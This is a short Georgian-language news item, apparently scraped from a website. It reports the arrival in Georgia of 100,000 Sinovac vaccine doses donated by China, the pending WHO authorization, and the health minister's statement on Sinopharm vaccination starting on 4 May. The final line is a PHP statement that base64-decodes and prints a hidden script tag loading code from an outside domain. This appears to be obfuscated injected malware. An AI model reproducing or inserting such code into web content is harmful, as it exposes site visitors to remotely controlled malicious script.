celsiusi
ავერსი შნაიდერი
100 ათასი დოზა „სინოვაკის“ ვაქცინა უკვე საქართველოშია, რომელიც ქვეყანამ ჩინეთისგან საჩუქრად მიიღო. 
 
 „სინოფარმის“ მსგავსად, "სინოვაკის" ვაქცინაც ტრადიციული მეთოდებით არის დამზადებული და გვერდითი მოვლენების სიმცირით გამოირჩევა, თუმცა, ვაქცინას ჯანდაცვის მსოფლიო ორგანიზაციის ავტორიზაცია ჯერ არ აქვს, ამიტომ ქვეყანა მის გამოყენებას არ ჩქარობს.  ჯერჯერობით უცნობია, როდიდან დაიწყება მასზე რეგისტრაცია და რა სამიზნე ჯგუფებზე იქნება გათვლილი აღნიშნული ვაქცინა.
 
ჯანდაცვის მინისტრის ეკატერინე ტიკარაძის განცხადებით , ჯანდაცვის მსოფლიო ორგანიზაცია ჩინური ვაქცინების ავტორიზაციის შესახებ გადაწყვეტილებას კვირის ბოლოს გამოაცხადებს, თუმცა მინისტრის თქმით, ქვეყანაში ამ ვაქცინებით ვაქცინაცია ჯანმოს უარყოფითი გადაწყვეტილების შემთხვევაშიც ჩვეულებრივ გაგრძელდება. 
 
ცნობისთვის, "სინოფარმით" ვაქცინაცია ქვეყანაში 4 მაისიდან იწყება. 
 
 
1265
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");